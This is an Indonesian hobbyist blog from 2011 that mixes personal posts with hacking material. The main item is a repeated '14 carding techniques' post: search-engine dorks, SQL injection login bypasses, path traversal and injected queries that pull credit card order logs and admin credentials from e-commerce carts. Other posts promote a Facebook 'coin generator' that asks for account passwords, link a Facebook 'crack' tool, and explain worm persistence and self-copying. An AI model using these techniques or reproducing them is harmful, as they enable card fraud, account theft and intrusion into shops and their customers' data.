Buat teman2 yang suka bermain game dari Facebook seperti Cityvile, Empire and Allies, Mafia Wars dan lainnya..
nih ane nemuin sebuah generator / cheat yang bisa memberikan kita COIN Facebook yang sering kali jika kita ingin kan kita di haruskan untuk berbayar,,
cara penggunaanya mudah kok
syarat nya,,
A. kita harus pernah minimal 1 kali memainkan Game yang ingin kita Dapatkan Coinnya.
B. Menggunakan Generator Harus dalam keadaan Game sedang beroperasi ( memainkan Game Target )
1. Buka Applikasinya
2. Pilih Game yang anda inginkan.
3. Pilih nominal Coin yang di inginkan
4 Next.
berikut nya kita akan di antar ke halaman konfirmasi.
5. masukan ID pengguna anda
6. masukan juga passwor anda guna meyakinkan server bahwa bner2 account anda yang akan di isi coinnya.
7. cheklis Tipe browser anda ( mozila or google crhome or Opera o Internet Explorer.
8. Klik Tombol "Get Coin"
tunggu Hingga Tampilan Sukses dan Kembali RELOAD game anda tersebut.
Dan lihat lah Hasil nya
Work 100%
silah kan DOWNLOAD disini
nb : jika Gagal Silahkan ulangi kembali dan perhatikan langkah langkah Pengunaan di atas.
thanks to Hacker Newbie Community
~ B D'Luciver ~
Minggu, 25 Desember 2011
Sabtu, 24 Desember 2011
Lock Desktop With VB 6
ok langsung aja
bahan" :
1.command button
1.textbox
epss
jangan lupa bro
di propeties form , windows state jadikan maxzmized
seperti ini :
dan di propeties form yang nama nya borderstyle di ganti menjadi none .
di propeties textbox cari yang bernama passwordchart ganti menjad " * " tanpa tanda kutip
lalu klik 2x command button
isi kan code berikut
selamat Berkarya Guys..
thanks to Hacker Newbie Community and Friends
bahan" :
1.command button
1.textbox
epss
jangan lupa bro
di propeties form , windows state jadikan maxzmized
seperti ini :
dan di propeties form yang nama nya borderstyle di ganti menjadi none .
di propeties textbox cari yang bernama passwordchart ganti menjad " * " tanpa tanda kutip
lalu klik 2x command button
isi kan code berikut
If Text1.Text = "Benisman" Then <<< Benisman adalah password nya
EndElseMsgBox " Password nya salah :* ", vbCritical, "salah"End If
kalo sudah anda akan menemukan tampilan seperti di atas jika di RUN :
nah tampilan di atas adalah tampilan standart nya..
bisa di kreasikan sesuai keinginanmu..
ini sebagai bahan bukti kalo yang ane posting ini bukan HOAX..!!
selamat Berkarya Guys..
thanks to Hacker Newbie Community and Friends
Minggu, 11 Desember 2011
Carding
Teknik Carding!!!!
14 Teknik Carding
Kali ini saya memberikan 14 teknik carding….
ini sih cara jadul tapi dah jarang bug kaya gini. tapi masih ada ko :p wkwkkw masih ampun dikit :p
simak aja ni :
1. contoh bugs pada bentuk toko sistem shopadmin :
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
Ketik google.com :–> allinurl:/shopadmin.asp
Contoh target : http://www.xxxxxx.com/shopadmin.asp
Kelemahan sistem ini bila penjahat memasukan kode injection seperti :
user : ‘or’1
pass : ‘or’1
2. contoh bugs pada bentuk toko sistem : Index CGI
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
google.com : Ketik –> allinurl:/store/index.cgi/page=
Contoh target : http://www.xxxxxx.com/cgi-bin/store/inde...t_blue.htm
Hapus short_blue.htm dan ganti dengan –> ../admin/files/order.log
Hasilnya:www.xxxxxxx.com/cgi-bin/store/index.cgi?page=../admin/files/order.log
3. contoh bugs pada bentuk toko sistem : metacart
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
google.com allinurl:/metacart/
Contoh target : http://www.xxxxxx.com/metacart/about.asp
Hapus moreinfo.asp dan ganti dengan –> /database/metacart.mdb
Hasilnya : /www.xxxxxx.com/metacart/database/metacart.mdb
4. contoh bugs pada bentuk toko sistem CShop
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
google.com : Ketik –> allinurl:/DCShop/
Contoh : http://www.xxxxxx.com/xxxx/DCShop/xxxx
Hapus /DCShop/xxxx dan ganti dengan –> /DCShop/orders/orders.txt atau /DCShop/Orders/orders.txt
Hasilnya : http://www.xxxx.com/xxxx/DCShop/orders/orders.txt
5. contoh bugs pada bentuk toko sistem : PDshopro
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
google.com : Ketik –> allinurl:/shop/category.asp/catid=
Contoh : http://www.xxxxx.com/shop/category.asp/catid=xxxxxx
Hapus /shop/category.asp/catid=xxxxx dang ganti dengan –> /admin/dbsetup.asp
Hasilnya : http://www.xxxxxx.com/admin/dbsetup.asp
Dari keterangan diatas , kita dapati file databasenya dgn nama sdatapdshoppro.mdb
Download file sdatapdshoppro.mdb dengan merubah url nya menjadi http://www.xxxxxx.com/data/pdshoppro.mdb
Buka file tsb pakai Microsoft Acces (karena untuk membaca database access.mdb sebaiknya pake ms access aja)
6. contoh bugs pada bentuk toko sistem : commerceSQL
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
google : Ketik –> allinurl:/commercesql/
Contoh : http://www.xxxxx.com/commercesql/xxxxx
Hapus commercesql/xxxxx dan ganti dengan –>
cgi-bin/commercesql/index.cgi?page=
Hasilnya : http://www.xxxxxx.com/cgi-bin/commercesq....cgi?page=
Untuk melihat admin config –>
http://www.xxxxxx.com/cgi-bin/commercesq...in_conf.pl
Untuk melihat admin manager –>
http://www.xxxxxx.com/cgi-bin/commercesq...anager.cgi
Untuk melihat file log/CCnya –>
http://www.xxxxx.com/cgi-bin/commercesql.../order.log
7. contoh bugs pada bentuk toko sistem : EShop
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
google: Ketik –> allinurl:/eshop/
Contoh : http://www.xxxxx.com/xxxxx/eshop
Hapus /eshop dan ganti dengan –> /cg-bin/eshop/database/order.mdb
Hasilnya : http://www.xxxxxx.com/…/cg-bin/eshop/database/order.mdb
Download file *.mdb nya dan Buka file tsb pakai Microsoft Acces (karena untuk membaca database access.mdb sebaiknya pake ms access aja)
8. contoh bugs pada bentuk toko sistem : Cart32 v3.5a
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
google.com: Ketik –> allinurl:/cart32.exe/
Contoh : http://www.xxxxxx.net/wrburns_s/cgi-bin/...oItemFound
Ganti NoItemFound dengan –> error
Bila kita mendapati page error dg keterangan instalasi dibawahnya, berarti kita sukses!
Sekarang, kita menuju pada keterangan di bawahnya, geser halaman kebawah, dan cari bagian Page Setup and Directory
Kalau dibagian tersebut terdapat list file dgn format/akhiran .c32 berarti di site tsb. terdapat file berisi data cc
Copy salah satu file .c32 yg ada atau semuanya ke notepad atau program text editor lainnya.
Ganti string url tsb. menjadi seperti ini : http://www.xxxxxx.net/wrburns_s/cgi-bin/cart32/
Nah.., paste satu per satu, file .c32 ke akhir url yg sudah dimodifikasi tadi, dengan format
http://www.xxxxx.com/cart32/
Contoh http://www.xxxxxxx.net/wrburns_s/cgi-bin...001065.c32
9. contoh bugs pada bentuk toko sistem : VP-ASP Shopping Cart 5.0 teknik/jalan ke dua
google.com Ketik –> allinurl:/vpasp/shopdisplayproducts.asp
Buka url target dan tambahkan string berikut di akhir bagian shopdisplayproducts.asp
Contoh :
http://xxxxxxx.com/vpasp/shopdisplayprod...20fldauto,
fldpassword%20from%20tbluser%20where%20fldusername=
‘admin’%20and%20fldpassword%20like%20′a%25′–
Gantilah nilai dari string url terakhir dg:
%20′a%25′–
%20′b%25′–
%20′c%25′–
Kalau berhasil, kita akan mendapatkan informasi username dan password admin
Untuk login admin ke http://xxxx.com/vpasp/shopadmin.asp
silahkan Cari sendiri data CCnya
10. contoh bugs pada bentuk toko sistem : VP-ASP Shopping Cart 5.0
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
google.com : Ketik –> allinurl:/vpasp/shopsearch.asp
Buka url target dan utk membuat admin baru, postingkan data berikut satu per satu pada bagian search engine :
Keyword=&category=5); insert into tbluser (fldusername) values
(”)–&SubCategory=&hide=&action.x=46&action.y=6
Keyword=&category=5); update tbluser set fldpassword=” where
fldusername=”–&SubCategory=All&action.x=33&action.y=6
Keyword=&category=3); update tbluser set fldaccess=’1′ where
fldusername=”–&SubCategory=All&action.x=33&action.y=6
Jangan lupa untuk mengganti dan nya terserah kamu.
Untuk mengganti password admin, masukkan keyword berikut :
Keyword=&category=5); update tbluser set fldpassword=” where
fldusername=’admin’–&SubCategory=All&action.x=33&action.y=6
Untuk login admin, ada di http://xxxxxxx/vpasp/shopadmin.asp
11. contoh bugs pada bentuk toko sistem : Lobby.asp
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
google.com Ketik –> allinurl: Lobby.asp
Contoh : http://www.xxxxx.com/mall/lobby.asp
Hapus tulisan mall/lobby.asp dan ganti dengan –> fpdb/shop.mdb
Hasilnya : http://www.xxxxx.com/fpdb/shop.mdb
12. contoh bugs pada bentuk toko sistem : Shopper.cgi
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
google : Ketik –> allinurl: /cgi-local/shopper.cgi
Contoh : http://www.xxxxxx.com/cgi-local/shopper....ction&key=
Tambah dengan –> …&template=order.log
Hasilnya : http://www.xxxxxxxx.com/cgi-local/shoppe...=order.log
13. contoh bugs pada bentuk toko sistem roddetail.asp
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
Ketik –> allinurl:proddetail.asp?prod=
Contoh : http://www.xxxxx.org/proddetail.asp?prod=ACSASledRaffle
Hapus tulisan proddtail.asp?prod=SG369 dan ganti dengan –> fpdb/vsproducts.mdb
Hasilnya : http://www.xxxxxx.org/fpdb/vsproducts.mdb
14. contoh bugs pada bentuk toko sistem igishop
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
google Ketik –> inurl:”/cart.php?m=”
Contoh : http://xxxxxxx.com/store/cart.php?m=view.
Hapus tulisan cart.php?m=view dan ganti dengan –>admin
Hasilnya http://xxxxxx.com/store/admin
Trus masukin username sama pass nya pake statment SQL injection
Usename : ‘or”=”
Password : ‘or”=”
Sumber : http://hacker-newbie.org/showthread.php?tid=10261
Kali ini saya memberikan 14 teknik carding….
ini sih cara jadul tapi dah jarang bug kaya gini. tapi masih ada ko :p wkwkkw masih ampun dikit :p
simak aja ni :
1. contoh bugs pada bentuk toko sistem shopadmin :
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
Ketik google.com :–> allinurl:/shopadmin.asp
Contoh target : http://www.xxxxxx.com/shopadmin.asp
Kelemahan sistem ini bila penjahat memasukan kode injection seperti :
user : ‘or’1
pass : ‘or’1
2. contoh bugs pada bentuk toko sistem : Index CGI
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
google.com : Ketik –> allinurl:/store/index.cgi/page=
Contoh target : http://www.xxxxxx.com/cgi-bin/store/inde...t_blue.htm
Hapus short_blue.htm dan ganti dengan –> ../admin/files/order.log
Hasilnya:www.xxxxxxx.com/cgi-bin/store/index.cgi?page=../admin/files/order.log
3. contoh bugs pada bentuk toko sistem : metacart
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
google.com allinurl:/metacart/
Contoh target : http://www.xxxxxx.com/metacart/about.asp
Hapus moreinfo.asp dan ganti dengan –> /database/metacart.mdb
Hasilnya : /www.xxxxxx.com/metacart/database/metacart.mdb
4. contoh bugs pada bentuk toko sistem CShop
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
google.com : Ketik –> allinurl:/DCShop/
Contoh : http://www.xxxxxx.com/xxxx/DCShop/xxxx
Hapus /DCShop/xxxx dan ganti dengan –> /DCShop/orders/orders.txt atau /DCShop/Orders/orders.txt
Hasilnya : http://www.xxxx.com/xxxx/DCShop/orders/orders.txt
5. contoh bugs pada bentuk toko sistem : PDshopro
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
google.com : Ketik –> allinurl:/shop/category.asp/catid=
Contoh : http://www.xxxxx.com/shop/category.asp/catid=xxxxxx
Hapus /shop/category.asp/catid=xxxxx dang ganti dengan –> /admin/dbsetup.asp
Hasilnya : http://www.xxxxxx.com/admin/dbsetup.asp
Dari keterangan diatas , kita dapati file databasenya dgn nama sdatapdshoppro.mdb
Download file sdatapdshoppro.mdb dengan merubah url nya menjadi http://www.xxxxxx.com/data/pdshoppro.mdb
Buka file tsb pakai Microsoft Acces (karena untuk membaca database access.mdb sebaiknya pake ms access aja)
6. contoh bugs pada bentuk toko sistem : commerceSQL
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
google : Ketik –> allinurl:/commercesql/
Contoh : http://www.xxxxx.com/commercesql/xxxxx
Hapus commercesql/xxxxx dan ganti dengan –>
cgi-bin/commercesql/index.cgi?page=
Hasilnya : http://www.xxxxxx.com/cgi-bin/commercesq....cgi?page=
Untuk melihat admin config –>
http://www.xxxxxx.com/cgi-bin/commercesq...in_conf.pl
Untuk melihat admin manager –>
http://www.xxxxxx.com/cgi-bin/commercesq...anager.cgi
Untuk melihat file log/CCnya –>
http://www.xxxxx.com/cgi-bin/commercesql.../order.log
7. contoh bugs pada bentuk toko sistem : EShop
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
google: Ketik –> allinurl:/eshop/
Contoh : http://www.xxxxx.com/xxxxx/eshop
Hapus /eshop dan ganti dengan –> /cg-bin/eshop/database/order.mdb
Hasilnya : http://www.xxxxxx.com/…/cg-bin/eshop/database/order.mdb
Download file *.mdb nya dan Buka file tsb pakai Microsoft Acces (karena untuk membaca database access.mdb sebaiknya pake ms access aja)
8. contoh bugs pada bentuk toko sistem : Cart32 v3.5a
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
google.com: Ketik –> allinurl:/cart32.exe/
Contoh : http://www.xxxxxx.net/wrburns_s/cgi-bin/...oItemFound
Ganti NoItemFound dengan –> error
Bila kita mendapati page error dg keterangan instalasi dibawahnya, berarti kita sukses!
Sekarang, kita menuju pada keterangan di bawahnya, geser halaman kebawah, dan cari bagian Page Setup and Directory
Kalau dibagian tersebut terdapat list file dgn format/akhiran .c32 berarti di site tsb. terdapat file berisi data cc
Copy salah satu file .c32 yg ada atau semuanya ke notepad atau program text editor lainnya.
Ganti string url tsb. menjadi seperti ini : http://www.xxxxxx.net/wrburns_s/cgi-bin/cart32/
Nah.., paste satu per satu, file .c32 ke akhir url yg sudah dimodifikasi tadi, dengan format
http://www.xxxxx.com/cart32/
Contoh http://www.xxxxxxx.net/wrburns_s/cgi-bin...001065.c32
9. contoh bugs pada bentuk toko sistem : VP-ASP Shopping Cart 5.0 teknik/jalan ke dua
google.com Ketik –> allinurl:/vpasp/shopdisplayproducts.asp
Buka url target dan tambahkan string berikut di akhir bagian shopdisplayproducts.asp
Contoh :
http://xxxxxxx.com/vpasp/shopdisplayprod...20fldauto,
fldpassword%20from%20tbluser%20where%20fldusername=
‘admin’%20and%20fldpassword%20like%20′a%25′–
Gantilah nilai dari string url terakhir dg:
%20′a%25′–
%20′b%25′–
%20′c%25′–
Kalau berhasil, kita akan mendapatkan informasi username dan password admin
Untuk login admin ke http://xxxx.com/vpasp/shopadmin.asp
silahkan Cari sendiri data CCnya
10. contoh bugs pada bentuk toko sistem : VP-ASP Shopping Cart 5.0
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
google.com : Ketik –> allinurl:/vpasp/shopsearch.asp
Buka url target dan utk membuat admin baru, postingkan data berikut satu per satu pada bagian search engine :
Keyword=&category=5); insert into tbluser (fldusername) values
(”)–&SubCategory=&hide=&action.x=46&action.y=6
Keyword=&category=5); update tbluser set fldpassword=” where
fldusername=”–&SubCategory=All&action.x=33&action.y=6
Keyword=&category=3); update tbluser set fldaccess=’1′ where
fldusername=”–&SubCategory=All&action.x=33&action.y=6
Jangan lupa untuk mengganti dan nya terserah kamu.
Untuk mengganti password admin, masukkan keyword berikut :
Keyword=&category=5); update tbluser set fldpassword=” where
fldusername=’admin’–&SubCategory=All&action.x=33&action.y=6
Untuk login admin, ada di http://xxxxxxx/vpasp/shopadmin.asp
11. contoh bugs pada bentuk toko sistem : Lobby.asp
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
google.com Ketik –> allinurl: Lobby.asp
Contoh : http://www.xxxxx.com/mall/lobby.asp
Hapus tulisan mall/lobby.asp dan ganti dengan –> fpdb/shop.mdb
Hasilnya : http://www.xxxxx.com/fpdb/shop.mdb
12. contoh bugs pada bentuk toko sistem : Shopper.cgi
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
google : Ketik –> allinurl: /cgi-local/shopper.cgi
Contoh : http://www.xxxxxx.com/cgi-local/shopper....ction&key=
Tambah dengan –> …&template=order.log
Hasilnya : http://www.xxxxxxxx.com/cgi-local/shoppe...=order.log
13. contoh bugs pada bentuk toko sistem roddetail.asp
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
Ketik –> allinurl:proddetail.asp?prod=
Contoh : http://www.xxxxx.org/proddetail.asp?prod=ACSASledRaffle
Hapus tulisan proddtail.asp?prod=SG369 dan ganti dengan –> fpdb/vsproducts.mdb
Hasilnya : http://www.xxxxxx.org/fpdb/vsproducts.mdb
14. contoh bugs pada bentuk toko sistem igishop
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
google Ketik –> inurl:”/cart.php?m=”
Contoh : http://xxxxxxx.com/store/cart.php?m=view.
Hapus tulisan cart.php?m=view dan ganti dengan –>admin
Hasilnya http://xxxxxx.com/store/admin
Trus masukin username sama pass nya pake statment SQL injection
Usename : ‘or”=”
Password : ‘or”=”
Sumber : http://hacker-newbie.org/showthread.php?tid=10261
Kamis, 08 Desember 2011
Materi E-Bisnin ( Pak Deni )
Langsung saja download Disini Downloadnya
jangan Lupa untuk FOLLOW blog saiia ..
kasihan,, udah setahun niyh blog tapi masih Sepi...
hehhehe
jangan Lupa untuk FOLLOW blog saiia ..
kasihan,, udah setahun niyh blog tapi masih Sepi...
hehhehe
Sabtu, 19 November 2011
My Trip
Wow
21 Slideshow: Ben’s trip from Bukittinggi, Sumatra, Indonesia to Padang was created by TripAdvisor. See another Padang slideshow. Create a free slideshow with music from your travel photos.
Sabtu, 05 November 2011
Formulir Pendaftaran ORMAWA HIMA TI
bagi mahasiswa angkatan angkatan 2010 dan 2011 yang ingin bergabung dalam kepengurusan HIMA TI dapat memperoleh Formulir nya di
Download 1
atau pada link berikut
Download 2
untuk informasi lengkap silahkan menghubungi :
- Ben Isman (0901093005)
fb : Ben Leviathan-boys
cp 083181680407
terima kasih
Download 1
atau pada link berikut
Download 2
untuk informasi lengkap silahkan menghubungi :
- Ben Isman (0901093005)
fb : Ben Leviathan-boys
cp 083181680407
terima kasih
FaceBook Crack
Buat ente ente yang Facebook nya pernah di HACK namun tidak bisa di ambil kembali walopun udah di ubah sandinya melalui account yahoo, namun tetap ilang..nih ada pencerahan.
ane nemuin sebuah program yang mungkin dapat membantu teman teman sekalian yang pernah kehilangan facebook..
nih ane kasih link program nya,
Silahkan Download Disini
tapi,, ane saranin Baca dulu tutorial yang dalam bentuk Notepad nya sebelum melakukan penyerangan balik.
Thanks atas waktu nya.
pembaca yang baik selalu meninggalkan komeng.
ane nemuin sebuah program yang mungkin dapat membantu teman teman sekalian yang pernah kehilangan facebook..
nih ane kasih link program nya,
Silahkan Download Disini
tapi,, ane saranin Baca dulu tutorial yang dalam bentuk Notepad nya sebelum melakukan penyerangan balik.
Thanks atas waktu nya.
pembaca yang baik selalu meninggalkan komeng.
Selasa, 01 November 2011
Pahami Dasar Virus Sebelum Bergelut di Dunia Virus
Pada dasarnya saya akan memberi sedikit penjelasan kepada anda tentang:
>> Sudut pandang seorang VM/VX
disini kita fokuskan pada worm.
>> Bagaimana seekor worm dapat menyebar luas.
>> Kelalaian korban.
>> Memanfaatkan kebiasaan VX untuk mengantisipasi serangan worm karena
kelalaian user (Tips aman dari virus tanpa Antivirus).
Selamat menikmati..
---// Sudut Pandang Seorang VX dan bagaimana seekor worm dapat
menyebar-luas dengan memanfaatkan kelalaian user.
Mari sejenak kita masuk kedalam sudut pandang seorang Virus Writer(VX).
Pada intinya, seorang VX akan memposisikan dirinya seakan-akan dirinya
adalah sang korban. VX biasanya akan memfokuskan perhatian pada hal-hal
berikut:
::(1):: Registry.
::(2):: Ms Configuration Untility.
::(3):: File Autoexec.bat dan win.ini.
::(4):: Task Manager.
::(5):: Special Directory.
::(6):: Kloning dan Icon.
::(7):: Media penyebaran.
[+] Disket
[+] Flashdisk
[+] E-mail
[+] IRC
[+] Web page
::(8):: System Restore.
::(9):: Pertahanan diri terhadap Worm Removal Tools, Antivirus serta
aplikasi-aplikasi lain yang (dianggap) membahayakan kelangsungan
hidup worm.
Nah, sekarang mari kita kupas satu-persatu poin-poin diatas lalu kita
nikmati bersama-sama hehehe.. :P
::(1)::------------:: Registry (Start --> Run --> ketik regedit).
Registry boleh dikatakan sebagai kunci utama dan hal yang akan sangat -
sangat diperhatikan oleh user dalam pembasmian worm. Registry adalah
serangkaian konfigurasi yang dipakai windows untuk mengontrol hardware
dan software yang ter-instal pada PC. Registry dibentuk oleh dua file,
yaitu system.dat dan user.dat yang berada di direktori windows. Dua file
ini memiliki file backup yang bernama system.da0 dan user.da0.
Ada lima key utama (Handle Key) pada registry.
1. HKEY_CLASSES_ROOT (subkey dari HKEY_LOCAL_MACHINE\Software\Classes)
.::Tempat menyimpan informasi yang akan memastikan bahwa files yang anda
buka dibuka dengan aplikasi yang benar.
2. HKEY_CURRENT_USER (Subkey dari HKEY_USERS)
.::Mengandung beragam informasi tentang user (pengguna yang sedang
menggunakan Pc). Bukan cuma profil aja, tapi semua settingan kompy
masing-masing user ada disini.
3. HKEY_LOCAL_MACHINE
.::Mengandung informasi tentang setting windows secara keseluruhan bagi
seluruh pengguna PC. Setting yang dimaksud disini meliputi hardware
dan software.
4. HKEY_USERS
.::Udah jelas khan dari namanya... Yup, isi dari handle key yang satu ini
adalah data dari seluruh pengguna PC.
5. HKEY_CURRENT_CONFIG
.::Berisi info tentang profil hardware yang digunakan PC saat komputer
menyala.
Hampir seluruh aksi yang dilakukan oleh worm tidak lepas dari seputar
memodifikasi registry. Dari registry jugalah worm biasanya di set agar
otomatis hidup tatkala komputer menyala. Hal tersebut dapat dilakukan
dengan menambahkan string Value pada lokasi berikut:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
Dari registry pula sang pembuat worm biasa mendisable fasilitas-fasilitas
penting seperti diantaranya MS Dos, Task Manager (MSCONFIG.EXE), Registry
Editor(Regedit.exe), merubah Registered Owner dan Registered Organization,
serta beragam aksi menyebalkan lainnya.
Karena itulah sang VX berusaha untuk mendisable Registry Editor agar worm
buatannya tidak bisa dihentikan dengan mudah.
::(2)::--------:: MsConfigurationUntility (Start-->Run-->ketik MSCONFIG).
Dari MSCONFIG user biasa memeriksa file/aplikasi apa saja yang dijalankan
otomatis ketika windows startup. Banyak hal bisa dilakkan dengan Ms
Configuration Untility. Dari MSCONFIG user bisa menghapus daftar aplikasi
yang tidak diinginkan. Dari sini pula user bisa dengan leluasa mengedit
isi file win.ini, autoexec.bat, system.ini dan config.sys. Oleh karena
itulah VX berusaha mencegah user untuk mengakses MSCONFIG demi kelangsungan
hidup ciptaannya.
Perlu anda ketahui bahwa pada windows 2000 Microsoft tidak menyertakan
file msconfig.exe. Mungkin waktu itu para pengembangnya lagi ngantuk kali
yee.. sehingga kelupaan menyertakan file penting ini hehehe...[Garing Mode:On]
::(3)::--------:: File Autoexec.bat dan win.ini
Apa yang special dari kedua file diatas? Ya,dengan sedikit memanipulasi
isi kedua file tersebut seorang VX bisa membuat Virusnya otomatis
berjalan ketika windows booting. Kedua file diatas akan di proses ketika
startup. Ah, yang bener? Mosok seeh?? Duuh.. gak percaya yach.. ok dech..
jaman sekarang ini segalanya membutuhkan pembuktian. Jika anda pengguna
windows 98, coba anda buka file Autoexec.bat yang terletak di C:\ kemudian
periksa atributnya dulu, jika beratribut read-only, maka hilangkan centang
pada atribut itu agar anda bisa melakukan modifikasi isi file. Setelah itu
klik kanan pada file dan pilih Edit. Jendela Notepad akan terbuka dan
menampilkan isi file Autoexec.bat. Ketik script berikut:
@echo off
echo.
echo Selamat datang di komputer Gue..
echo Biar jelek begini, yang penting gw pake uang halal..
echo.
echo Sekarang tekan sembarang tombol..
echo ----------------------------------------------------
pause
Klik [file]-->[save] untuk menyimpannya. Tutup Notepad kemudian restart
komputer anda. Maka ketika windows booting pesan anda akan tampil.
Kini kita beralih ke file win.ini. File Win.ini terletak di directory
Windows berisi beberapa konfigurasi yang mengatur OS anda. Anda bisa
menjalankan file tertentu secara otomatis dengan memodifikasi isi file
win.ini. Untuk mempermudah pemahaman anda, coba tambahkan baris berikut:
[Windows]
load=c:\lokasi_program\nama_program_yang_anda_inginkan.exe
run=c:\lokasi_program\nama_program_yang_anda_inginkan.exe
Ada beberapa file lagi yang juga sama-sama diproses ketika windows
startup yaitu winstart.bat, system.ini dan config.sys namun virus kerap
kali memilih kedua file "special" yang telah saya bahas diatas.
::(4)::--------:: Task Manager (Tekan CTRL + ALT + DEL secara bersamaan).
Sesuai dengan namanya, Task Manager akan menampilkan aplikasi apa saja
yang sedang berjalan baik yang secara background atau tidak. Melalui Task
Manager kita bisa menghentikan "secara paksa" program yang tidak kita
inginkan. Sang VX menyadari benar akan hal ini, dan banyak sekali worm
yang diprogram untuk mampu mendisable Task Manager. Metodanya sendiri
bermacam-macam. Ada yang otomatis mematikan fungsi mouse ketika Task
Manager tebuka, ada pula yang langsung melakukan shutdown atau restart.
Diantaranya yang paling sering dilakukan adalah dengan perintah Taskkill,
namun cara ini tergolong kurang efektif karena perintah taskkill tidak
berjalan pada windows 9x dan ME.
::(5)::-------:: Special Directory.
Ada 2 directory special yang sudah menjadi "langganan" worm dan Virus
yaitu directory windows dan directory system. Kedua directory ini memiliki
keunikan tersendiri karena kemudahan pengesetan variabel ketika kita menulis
kode program. Saya beri contoh sederhana dalam batch programming (duuh..
dari tadi sederhana melulu.. :P mudah-mudahan anda gak bosan yach..).
Misalnya anda ingin agar Virus anda mengcopykan dirinya sendiri ke directory
windows dan directory system maka script untuk melakukan aksi copy yang
kita ketikkan ialah:
Copy %0 %windir%\virus.bat
Copy %0 %sysdir%\virus.bat
Karakter %0 berarti memerintahkan program tersebut untuk membaca dirinya
sendiri dan %windir% serta %sysdir% sudah merupakan variabel default untuk
menunjukkan directory windows dan system. Eh, mengapa scriptnya gak seperti
ini saja:
Copy %0 C:\windows\virus.bat
Copy %0 C:\windows\system\virus.bat.
Hayoo.. kalau pake perintah diatas khan sama saja?? Tidak!! Jawabannya
Tidak Sama pada kasus tertentu. Perlu anda ketahui bahwa tidak selamanya
directory Windows benama Windows, dan tidak selamanya pula directory
System bernama System. Untuk lebih jelasnya perhatikan tabel berikut:
-------------------------------------------------------------------
| Versi Windows | Nama Directory Windows | Nama Directory System |
|-----------------------------------------------------------------|
| Windows 9x, me | windows | system |
| windows 2000 | winnt | system32 |
| windows XP | windows | system32 |
-------------------------------------------------------------------
::(6)::-------:: Kloning dan Icon.
Dengan kemampuan kloning dan penggunaan icon yang "tepat" seekor worm
akan menyebar dengan sukses. Akhir-akhir ini banyak worm menggunakan
icon HTML Document, Microsoft Word Document dan icon Folder untuk me-
ngecoh user. Dan ternyata?? Banyak sekali para pengguna komputer yang
tertipu mentah-mentah! Hal ini dibuktikan dengan maraknya penyebaran
worm yang sangat meluas!! Tidak sadarkah anda bahwa penyebaran worm
yang bombastis ini tidak lain dan tidak bukan karena kecerobohan anda
sendiri?? Hehehe.. jadi kalo anda ingin mengetahui seberapa ceroboh user
di negara kita ini, tinggal kita pantau saja dari banyak tidaknya orang
yang terserang worm :P
Sebelum anda membuka dokumen apapun, pastikan dengan benar bahwa icon yang
digunakan SESUAI sengan ekstensi file yang seharusnya. Banyak user yang
lalai akan hal ini. Biasakan untuk melihat properties file terlebih
dahulu sebelum membukanya. Worm belakangan ini "gemar" memakai icon folder
dan msword namun memiliki ekstensi *.scr dan *.exe padahal kita tau bahwa
folder tidak memiliki ekstensi dan ekstensi untuk file microsoft word
adalah *.doc Ingat!! Jangan terkecoh!! waspadalah!! waspadalah!! :P
::(7)::-------:: Media penyebaran.
[+]Disket dan Flashdisk
--------------------
Tentu saja hal ini merupakan tahap yang tak kalah pentingnya. VX akan
memilih sasaran media penyipanan yang sering digunakan oleh user. Misalnya
dulu mungkin orang hanya menggunakan disket, namun seiring berkembangnya
teknologi, penggunaan FlashDisk semakin meluas. Dan bisa ditebak, banyak
pula worm kini yang mampu menggandakan dirinya kedalam FlashDisk.
[+]Email
-----
Email juga sangat-sangat potensial dalam penyebaran worm. Di zaman yang
serba-E ini email sekan menjadi kebutuhan pokok. Banyak sekali worm yang
memiliki SMTP sendiri untuk menyebarkan dirinya. Biasanya email seperti ini
memiliki subject yang menarik, serta isi yang menggoda user untuk membuka
attachment Virus yang disertakan.
Worm akan memeriksa address book yang ada di aplikasi mail komputer korban
kemudian mencatat seluruh daftar alamat email yang ada disana. Adakalanya
worm hanya memilih alamat email tertentu saja (secara acak) namun terkadang
juga melakukan pengiriman diri sendiri kepada seluruh alamat yang ditemukan.
[+]IRC
----
IRC sejak lama telah dimanfaatkan oleh VX dalam penyebaran worm. Biasanya
worm akan memodifikasi isi file mirc.ini sehingga nantinya worm akan aktif
di beberapa channel yang ditentukan untuk berfungsi selayaknya boot.
[+]Website
-------
Yang terakhir ini nampaknya kian marak kita temui, yaitu penyebaran melalui
web page. Biasanya admin situs yang menjadi seorang VX akan menyisipkan kode
javascript yang akan menjalankan file virus secara otomatis tanpa disadari
oleh korban (pengunjung). Admin-admin "durjana" (semoga Tuhan mengampuni
dosa-dosa mereka.. ^_^ .. ) seperti ini biasanya mengelola situs yang
"menarik" seperti penyedia crack, serial number, hacker tools dan situs-
situs p0rn0.
